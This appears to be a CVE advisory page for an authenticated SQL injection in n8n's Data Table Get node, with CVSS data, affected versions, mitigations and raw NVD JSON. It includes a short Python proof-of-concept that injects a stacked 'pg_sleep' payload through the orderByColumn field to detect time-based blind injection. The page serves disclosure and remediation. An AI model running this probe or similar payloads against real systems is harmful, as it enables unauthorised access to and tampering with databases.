CVE-2026-33713

Description

n8n is an open source workflow automation platform. Prior to versions 2.14.1, 2.13.3, and 1.123.26, an authenticated user with permission to create or modify workflows could exploit a SQL injection vulnerability in the Data Table Get node. On default SQLite DB, single statements can be manipulated and the attack surface is practically limited. On PostgreSQL deployments, multi-statement execution is possible, enabling data modification and deletion. The issue has been fixed in n8n versions 1.123.26, 2.13.3, and 2.14.1. Users should upgrade to one of these versions or later to remediate the vulnerability. If upgrading is not immediately possible, administrators should consider the following temporary mitigations: Limit workflow creation and editing permissions to fully trusted users only, disable the Data Table node by adding `n8n-nodes-base.dataTable` to the `NODES_EXCLUDE` environment variable, and/or review existing workflows for Data Table Get nodes where `orderByColumn` is set to an expression that incorporates external or user-supplied input. These workarounds do not fully remediate the risk and should only be used as short-term mitigation measures.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:n8n:n8n:*:*:*:*:*:node.js:*:* - VULNERABLE

cpe:2.3:a:n8n:n8n:2.14.0:*:*:*:*:node.js:*:* - VULNERABLE

n8n < 1.123.26

n8n >= 2.13.0 < 2.13.3

n8n >= 2.14.0 < 2.14.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Proof of Concept for CVE-2026-33713
# Target: n8n Data Table Get Node
# Note: Requires authentication and workflow edit permissions

target_url = "http://<n8n-instance>/webhook/test"
session_cookie = "<valid_session_cookie>"

headers = {
    "Content-Type": "application/json",
    "Cookie": f"session={session_cookie}"
}

# Malicious payload exploiting 'orderByColumn' in Data Table Get node
# Example payload for PostgreSQL: Test for time-based blind SQLi
sql_payload = "1; SELECT pg_sleep(5)--"

workflow_data = {
    "nodes": [
        {
            "parameters": {
                "operation": "getAll",
                "orderByColumn": sql_payload
            },
            "name": "Data Table",
            "type": "n8n-nodes-base.dataTable",
            "position": [250, 300]
        }
    ],
    "connections": {}
}

try:
    response = requests.post(target_url, json=workflow_data, headers=headers)
    if response.elapsed.total_seconds() >= 5:
        print("[+] Potential SQL Injection successful (Time-based delay detected).")
    else:
        print("[-] Payload executed but no delay detected or request failed.")
except Exception as e:
    print(f"[!] Error: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-33713
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-33713
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-33713/
[4] VulDB https://vuldb.com/cve/CVE-2026-33713
[5] https://github.com/n8n-io/n8n/security/advisories/GHSA-98c2-4cr3-4jc3

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-33713", "sourceIdentifier": "[email protected]", "published": "2026-03-25T18:16:32.700", "lastModified": "2026-03-27T19:39:36.813", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "n8n is an open source workflow automation platform. Prior to versions 2.14.1, 2.13.3, and 1.123.26, an authenticated user with permission to create or modify workflows could exploit a SQL injection vulnerability in the Data Table Get node. On default SQLite DB, single statements can be manipulated and the attack surface is practically limited. On PostgreSQL deployments, multi-statement execution is possible, enabling data modification and deletion. The issue has been fixed in n8n versions 1.123.26, 2.13.3, and 2.14.1. Users should upgrade to one of these versions or later to remediate the vulnerability. If upgrading is not immediately possible, administrators should consider the following temporary mitigations: Limit workflow creation and editing permissions to fully trusted users only, disable the Data Table node by adding `n8n-nodes-base.dataTable` to the `NODES_EXCLUDE` environment variable, and/or review existing workflows for Data Table Get nodes where `orderByColumn` is set to an expression that incorporates external or user-supplied input. These workarounds do not fully remediate the risk and should only be used as short-term mitigation measures."}, {"lang": "es", "value": "n8n es una plataforma de automatización de flujos de trabajo de código abierto. Antes de las versiones 2.14.1, 2.13.3 y 1.123.26, un usuario autenticado con permiso para crear o modificar flujos de trabajo podría explotar una vulnerabilidad de inyección SQL en el nodo Data Table Get. En la base de datos SQLite predeterminada, las sentencias individuales pueden ser manipuladas y la superficie de ataque está prácticamente limitada. En implementaciones de PostgreSQL, la ejecución de múltiples sentencias es posible, lo que permite la modificación y eliminación de datos. El problema ha sido solucionado en las versiones de n8n 1.123.26, 2.13.3 y 2.14.1. Los usuarios deben actualizar a una de estas versiones o posteriores para remediar la vulnerabilidad. Si la actualización no es posible de inmediato, los administradores deben considerar las siguientes mitigaciones temporales: Limitar los permisos de creación y edición de flujos de trabajo solo a usuarios de plena confianza, deshabilitar el nodo Data Table añadiendo 'n8n-nodes-base.dataTable' a la variable de entorno 'NODES_EXCLUDE', y/o revisar los flujos de trabajo existentes en busca de nodos Data Table Get donde 'orderByColumn' esté configurado con una expresión que incorpore entrada externa o proporcionada por el usuario. Estas soluciones provisionales no remedian completamente el riesgo y solo deben usarse como medidas de mitigación a corto plazo."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "des ... (truncated)